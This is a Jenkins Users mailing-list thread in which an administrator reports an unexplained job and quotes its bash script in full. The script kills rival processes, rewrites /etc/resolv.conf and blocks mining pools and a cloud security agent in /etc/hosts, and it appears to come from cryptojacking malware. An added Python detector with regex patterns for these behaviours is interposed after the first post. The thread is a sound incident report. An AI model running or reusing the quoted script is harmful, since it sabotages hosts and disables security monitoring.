Potential Malware


Randall Becker

Jun 22, 2020, 1:15:02 PM
to Jenkins Users
Hi All,

We just installed Jenkins 2.240 and suddenly there is a job with some really strange content, including:

#!/bin/bash

threadCount=$(lscpu | grep 'CPU(s)' | grep -v ',' | awk '{print $2}' | head -n 1);
hostHash=$(hostname -f | md5sum | cut -c1-8);
echo "${hostHash} - ${threadCount}";
ktr () {
    killall trace;pkill -9 -f trace;killall -s SIGKILL trace
    killall vunix;pkill -9 -f vunix;killall -s SIGKILL vunix
    killall viunix;pkill viunix;killall -s SIGKILL viunix
    kill -9 $(ps -ux | grep trace | awk '{ print $2 }')
    kill -9 $(ps -ux | grep vunix | awk '{ print $2 }')
    kill -9 $(ps -ux | grep viunix | awk '{ print $2 }')
    echo kill
}

ktr
ktr
ktr
echo plsfoodforcatsnlove
echo 'nameserver 1.1.1.1' > /etc/resolv.conf;echo 'nameserver 8.8.8.8' >> /etc/resolv.conf;echo 'nameserver 180.76.76.76' >> /etc/resolv.conf
echo "0.0.0.0 blockchain.info" >> /etc/hosts;echo "0.0.0.0 35.225.36.167" >> /etc/hosts;echo "0.0.0.0 100.100.25.3 jsrv.aegis.aliyun.com" >> /etc/hosts
echo "0.0.0.0 100.100.25.4 update.aegis.aliyun.co" >> /etc/hosts;echo "0.0.0.0 185.164.72.119" >> /etc/hosts;echo "0.0.0.0 163.172.191.181" >> /etc/hosts
echo "0.0.0.0 pool.supportxmr.com" >> /etc/hosts;echo "0.0.0.0 pinto.mamointernet.icu" >> /etc/hosts;echo "0.0.0.0 sdk.bce.baidu.com" >> /etc/hosts
echo "0.0.0.0 lsd.systemten.org" >> /etc/hosts;
echo "0.0.0.0 pool.minexmr.com" >> /etc/hosts
echo "0.0.0.0 minexmr.com" >> /etc/hosts

This is really creepy because this script cannot possibly run on our system (the good part). The bad part is that no one in our organization created this job. Is it possible that there is some malware floating around? Our Jenkins instance is hiding behind a firewall so there's no way in.

Thanks,
Randall
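
A defender-side check for the kind of job described in the post above, as an added example that is not part of the original thread or of Jenkins: it scans freestyle job `config.xml` files for shell steps that rewrite `/etc/hosts` or `/etc/resolv.conf` or force-kill processes, the behaviours visible in the quoted script. The `jobs/<name>/config.xml` layout under the Jenkins home directory, the rule names and the two sample configs are assumptions constructed for illustration.

```python
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# Behaviours visible in the quoted job script: DNS/hosts rewrites and forced kills.
SUSPICIOUS = {
    "hosts-write": re.compile(r">>?\s*/etc/hosts\b"),
    "resolv-write": re.compile(r">>?\s*/etc/resolv\.conf\b"),
    "force-kill": re.compile(r"\b(?:killall|pkill|kill)\s+(?:-9|-s\s+SIGKILL)\b"),
}

def scan_job(config_xml):
    """Return the sorted rule names matched by any shell step in one config.xml."""
    # Jenkins may write an XML 1.1 declaration, which XML 1.0 parsers do not
    # reliably accept, so drop the declaration before parsing.
    body = re.sub(r"^\s*<\?xml[^>]*\?>", "", config_xml)
    hits = set()
    for cmd in ET.fromstring(body).iter("command"):  # "Execute shell" steps
        for name, rx in SUSPICIOUS.items():
            if cmd.text and rx.search(cmd.text):
                hits.add(name)
    return sorted(hits)

def scan_home(jenkins_home):
    """Scan jobs/<name>/config.xml under a Jenkins home; map job name -> hits."""
    report = {}
    for cfg in sorted(Path(jenkins_home).glob("jobs/*/config.xml")):
        try:
            hits = scan_job(cfg.read_text(encoding="utf-8", errors="replace"))
        except ET.ParseError:
            hits = ["unparseable-config"]  # surface it rather than skip silently
        if hits:
            report[cfg.parent.name] = hits
    return report

# Constructed sample configs (not taken from a real Jenkins instance).
SUSPECT = """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell><command>#!/bin/bash
killall trace;pkill -9 -f trace;killall -s SIGKILL trace
echo 'nameserver 1.1.1.1' &gt; /etc/resolv.conf
echo "0.0.0.0 pool.minexmr.com" &gt;&gt; /etc/hosts
</command></hudson.tasks.Shell></builders></project>"""
BENIGN = """<?xml version='1.1' encoding='UTF-8'?>
<project><builders><hudson.tasks.Shell><command>make test</command>
</hudson.tasks.Shell></builders></project>"""

if __name__ == "__main__":
    print(scan_home(sys.argv[1]) if len(sys.argv) > 1 else scan_job(SUSPECT))
```

A hit is a prompt to review who created the job and when, not proof of compromise, since legitimate build steps can also kill processes or edit host files.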

Daniel Beck

Jun 22, 2020, 2:00:09 PM
to jenkins...@googlegroups.com
Thanks for your report.

I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.

Jan Monterrubio

Jul 1, 2020, 9:55:06 AM
to Jenkins Users
Randall/Daniel, if there does end up being malware for this release would you mind replying on this thread? 


On Monday, June 22, 2020 at 1:00:09 PM UTC-5, Daniel Beck wrote:
> Thanks for your report.
>
> I filed an issue on your behalf in the Jenkins project's private security issue tracker. You should have gotten an email notification from Jira about it. Please provide more information there to help us investigate.



Randall Becker

Jul 1, 2020, 10:42:22 AM
to Jenkins Users
We have locked down the system and have not had a recurrence. If there is one, I will report it ASAP.

Thank you all for the concern :)

Cheers,
Randall